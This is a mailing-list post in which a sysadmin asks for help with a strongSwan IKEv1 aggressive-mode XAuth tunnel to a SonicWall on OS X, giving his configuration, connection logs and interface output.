<div dir="ltr"><div class="gmail_default" style="font-family:'courier new',monospace">Hello,</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">this is my first message to the list ;-)</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">my setting:</div><div class="gmail_default" style="font-family:'courier new',monospace">VPN Server: Sonicwall NSA E5500 "WAN Group VPN"</div><div class="gmail_default" style="font-family:'courier new',monospace">Previously I made it work with CentOS6 and yum install strongswan, all fine with a weakswan conn.</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">Now trying same conn with OSX 10.10 yosemite, just to act as a roadwarrior against same VPN Server:</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><blockquote style="margin:0px 0px 0px 40px;border:none;padding:0px"><div class="gmail_default" style="font-family:'courier new',monospace">brew install strongswan --with-curl --with-suite-b</div></blockquote><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">in charon.conf</div><blockquote style="margin:0px 0px 0px 40px;border:none;padding:0px"><div class="gmail_default" style="font-family:'courier new',monospace">i_dont_care_about_security_and_use_aggressive_mode_psk = yes</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div></blockquote><div class="gmail_default" style="font-family:'courier new',monospace">I'll ofuscate some info...</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">$ cat ipsec.conf</div><div class="gmail_default" style="font-family:'courier new',monospace">config setup</div><div class="gmail_default" style="font-family:'courier new',monospace">conn gandia12<br></div><div class="gmail_default"><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>auto=add</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>type=tunnel</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>aggressive=yes</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>keyexchange=ikev1</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span></font><span style="font-family:'courier new',monospace">left=%defaultroute</span></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span></font><span style="font-family:'courier new',monospace">leftauth=psk</span></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>leftid=GroupVPN</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>leftauth2=xauth</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>xauth=client</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>xauth_identity=user</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span></font><span style="font-family:'courier new',monospace">right=<a href="http://host.domain.com">host.domain.com</a></span></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>rightid=SNW UNIQ ID</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>rightsubnet="<a href="http://192.168.12.0/24">192.168.12.0/24</a>"</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>rightauth=psk</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span></font><span style="font-family:'courier new',monospace">keyingtries=1</span></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>ike=3des-sha1-modp1024</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>ikelifetime=28800s</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>esp=3des-sha1</font></div><div class="gmail_default"><font face="courier new, monospace"><span class="" style="white-space:pre"> </span>lifetime=28800s</font></div></div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">$ cat ipsec.secrets</div><blockquote style="margin:0px 0px 0px 40px;border:none;padding:0px"><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">"GroupVPN" "SNW UNIQ ID" : PSK "Secret;-)"</div><div class="gmail_default">user : XAUTH "p@w0rd;-)"</div></div></blockquote><font face="courier new, monospace"><div><div><br></div><div>$ sudo ipsec start</div><div>Starting weakSwan 5.2.2 IPsec [starter]...</div><div>no netkey IPsec stack detected</div><div>no KLIPS IPsec stack detected</div><div>no known IPsec stack detected, ignoring!</div></div></font><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">$ sudo ipsec up gandia12</div><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">ULISESXXI:etc alexval$ sudo ipsec up gandia12</div><div class="gmail_default">initiating Aggressive Mode IKE_SA gandia12[1] to 94.127.192.243</div><div class="gmail_default">generating AGGRESSIVE request 0 [ SA KE No ID V V V V ]</div><div class="gmail_default">sending packet: from 192.168.2.15[500] to destip[500] (396 bytes)</div><div class="gmail_default">received packet: from destip[500] to 192.168.2.15[500] (405 bytes)</div><div class="gmail_default">parsed AGGRESSIVE response 0 [ SA KE No ID V V V NAT-D NAT-D V V HASH ]</div><div class="gmail_default">received unknown vendor ID: 40:4b:f4:39:52:2c:a3:f6</div><div class="gmail_default">received unknown vendor ID: 5b:36:2b:c8:20:f6:00:08</div><div class="gmail_default">received NAT-T (RFC 3947) vendor ID</div><div class="gmail_default">received DPD vendor ID</div><div class="gmail_default">received XAuth vendor ID</div><div class="gmail_default">local host is behind NAT, sending keep alives</div><div class="gmail_default">generating AGGRESSIVE request 0 [ NAT-D NAT-D HASH ]</div><div class="gmail_default">sending packet: from 192.168.2.15[4500] to destip[4500] (108 bytes)</div><div class="gmail_default">received packet: from destip[4500] to 192.168.2.15[4500] (76 bytes)</div><div class="gmail_default">parsed TRANSACTION request 4014275289 [ HASH CPRQ(X_TYPE X_USER X_PWD) ]</div><div class="gmail_default">generating TRANSACTION response 4014275289 [ HASH CPRP(X_USER X_PWD) ]</div><div class="gmail_default">sending packet: from 192.168.2.15[4500] to destip[4500] (92 bytes)</div><div class="gmail_default">received packet: from destip[4500] to 192.168.2.15[4500] (84 bytes)</div><div class="gmail_default">parsed INFORMATIONAL_V1 request 2418823313 [ HASH N(INITIAL_CONTACT) ]</div><div class="gmail_default">configuration payload missing in XAuth request</div><div class="gmail_default">establishing connection 'gandia12' failed</div><div class="gmail_default"><br></div><div class="gmail_default">ULISESXXI:etc alexval$ sudo ipsec up gandia12</div><div class="gmail_default">initiating Aggressive Mode IKE_SA gandia12[2] to destip</div><div class="gmail_default">generating AGGRESSIVE request 0 [ SA KE No ID V V V V ]</div><div class="gmail_default">sending packet: from 192.168.2.15[500] to destip[500] (396 bytes)</div><div class="gmail_default">received packet: from destip[500] to 192.168.2.15[500] (405 bytes)</div><div class="gmail_default">parsed AGGRESSIVE response 0 [ SA KE No ID V V V NAT-D NAT-D V V HASH ]</div><div class="gmail_default">received unknown vendor ID: 40:4b:f4:39:52:2c:a3:f6</div><div class="gmail_default">received unknown vendor ID: 5b:36:2b:c8:20:f6:00:08</div><div class="gmail_default">received NAT-T (RFC 3947) vendor ID</div><div class="gmail_default">received DPD vendor ID</div><div class="gmail_default">received XAuth vendor ID</div><div class="gmail_default">local host is behind NAT, sending keep alives</div><div class="gmail_default">generating AGGRESSIVE request 0 [ NAT-D NAT-D HASH ]</div><div class="gmail_default">sending packet: from 192.168.2.15[4500] to destip[4500] (108 bytes)</div><div class="gmail_default">received packet: from destip[4500] to 192.168.2.15[4500] (76 bytes)</div><div class="gmail_default">parsed TRANSACTION request 1102551187 [ HASH CPRQ(X_TYPE X_USER X_PWD) ]</div><div class="gmail_default">generating TRANSACTION response 1102551187 [ HASH CPRP(X_USER X_PWD) ]</div><div class="gmail_default">sending packet: from 192.168.2.15[4500] to destip[4500] (92 bytes)</div><div class="gmail_default">received packet: from destip[4500] to 192.168.2.15[4500] (68 bytes)</div><div class="gmail_default">parsed TRANSACTION request 3574825738 [ HASH CPS(X_STATUS) ]</div><div class="gmail_default">XAuth authentication of 'user' (myself) successful</div><div class="gmail_default">IKE_SA gandia12[2] established between 192.168.2.15[GroupVPN]...destip[SNW UNIQ ID]</div><div class="gmail_default">scheduling reauthentication in 28124s</div><div class="gmail_default">maximum IKE_SA lifetime 28664s</div><div class="gmail_default">generating TRANSACTION response 3574825738 [ HASH CPA(X_STATUS) ]</div><div class="gmail_default">sending packet: from 192.168.2.15[4500] to destip[4500] (68 bytes)</div><div class="gmail_default">generating QUICK_MODE request 1778390774 [ HASH SA No ID ID ]</div><div class="gmail_default">sending packet: from 192.168.2.15[4500] to destip[4500] (196 bytes)</div><div class="gmail_default">received packet: from destip[4500] to 192.168.2.15[4500] (156 bytes)</div><div class="gmail_default">parsed QUICK_MODE response 1778390774 [ HASH SA No ID ID ]</div><div class="gmail_default">CHILD_SA gandia12{1} established with SPIs 75525fbd_i 42f23025_o and TS <a href="http://192.168.2.15/32">192.168.2.15/32</a> === <a href="http://192.168.12.0/24">192.168.12.0/24</a> </div><div class="gmail_default">connection 'gandia12' established successfully</div></div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">The tunnel is stablished OK always in the second try, sonicwalls asks twice for the username and password.</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">The tunnel interface utun0 gets created:</div><blockquote style="margin:0px 0px 0px 40px;border:none;padding:0px"><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">Feb 24 02:55:57 ULISESXXI kernel[0]: utun_ctl_connect: creating interface utun0</div></div><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">Feb 24 02:55:57 ULISESXXI.local charon[22124]: 00[LIB] created TUN device: utun0</div></div></blockquote><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default"><br></div></div><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">$ ifconfig</div><div class="gmail_default">lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>options=3<RXCSUM,TXCSUM></div><div class="gmail_default"><span class="" style="white-space:pre"> </span>inet6 ::1 prefixlen 128 </div><div class="gmail_default"><span class="" style="white-space:pre"> </span>inet 127.0.0.1 netmask 0xff000000 </div><div class="gmail_default"><span class="" style="white-space:pre"> </span>inet6 fe80::1%lo0 prefixlen 64 scopeid 0x1 </div><div class="gmail_default"><span class="" style="white-space:pre"> </span>nd6 options=1<PERFORMNUD></div><div class="gmail_default">gif0: flags=8010<POINTOPOINT,MULTICAST> mtu 1280</div><div class="gmail_default">stf0: flags=0<> mtu 1280</div><div class="gmail_default">en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>options=4<VLAN_MTU></div><div class="gmail_default"><span class="" style="white-space:pre"> </span>ether b8:8d:12:55:d6:ba </div><div class="gmail_default"><span class="" style="white-space:pre"> </span>inet6 fe80::ba8d:12ff:fe55:d6ba%en1 prefixlen 64 scopeid 0x4 </div><div class="gmail_default"><span class="" style="white-space:pre"> </span>inet 192.168.2.15 netmask 0xffffff00 broadcast 192.168.2.255</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>nd6 options=1<PERFORMNUD></div><div class="gmail_default"><span class="" style="white-space:pre"> </span>media: autoselect (100baseTX <full-duplex,flow-control>)</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>status: active</div><div class="gmail_default">en0: flags=8823<UP,BROADCAST,SMART,SIMPLEX,MULTICAST> mtu 1500</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>ether 44:2a:60:f5:bf:44 </div><div class="gmail_default"><span class="" style="white-space:pre"> </span>nd6 options=1<PERFORMNUD></div><div class="gmail_default"><span class="" style="white-space:pre"> </span>media: autoselect (<unknown type>)</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>status: inactive</div><div class="gmail_default">p2p0: flags=8802<BROADCAST,SIMPLEX,MULTICAST> mtu 2304</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>ether 06:2a:60:f5:bf:44 </div><div class="gmail_default"><span class="" style="white-space:pre"> </span>media: autoselect</div><div class="gmail_default"><span class="" style="white-space:pre"> </span>status: inactive</div><div class="gmail_default">utun0: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 1400</div></div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">But once stablished no packets are arriving to the VPN Server.</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><blockquote style="margin:0px 0px 0px 40px;border:none;padding:0px"><div class="gmail_default" style="font-family:'courier new',monospace">$ setkey -D</div><div class="gmail_default" style="font-family:'courier new',monospace">pfkey_open: No such file or directory</div></blockquote><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">The only error found in the log is when $ ipsec stop:</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><blockquote style="margin:0 0 0 40px;border:none;padding:0px"><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">Feb 24 03:02:33 ULISESXXI.local charon[22168]: 00[DMN] signal of type SIGINT received. Shutting down</div></div><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">Feb 24 03:02:33 ULISESXXI kernel[0]: SIOCPROTODETACH_IN6: utun0 error=6</div></div><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">Feb 24 03:02:33 ULISESXXI.local charon[22168]: 00[ESP] flushing policies</div></div><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">Feb 24 03:02:33 ULISESXXI.local charon[22168]: 00[ESP] flushing SAD</div></div><div class="gmail_default" style="font-family:'courier new',monospace"><div class="gmail_default">Feb 24 03:02:33 ULISESXXI.local charon[22168]: 00[ESP] flushing allocated SPIs</div></div></blockquote><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">Please I ask for your valuable help. What I can double check?</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace">Thanks.</div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div class="gmail_default" style="font-family:'courier new',monospace"><br></div><div><div class="gmail_signature"><div dir="ltr"><div><font face="courier new, monospace">--</font></div><div><font face="courier new, monospace">Alejandro Valcarcel Garcia<br>Responsable de sistemas y comunicaciones<br>ODEC - Construimos Soluciones<br><br><a href="mailto:avalcarcel@odec.es" target="_blank">avalcarcel@odec.es</a> - <a href="http://www.odec.es" target="_blank">http://www.odec.es</a> - Calle Vicent Macip, 1 (46701) Gandia SPAIN - T: +34 962 860 466 ext 1292 - M: +34 699 679 435</font></div></div></div></div>
</div>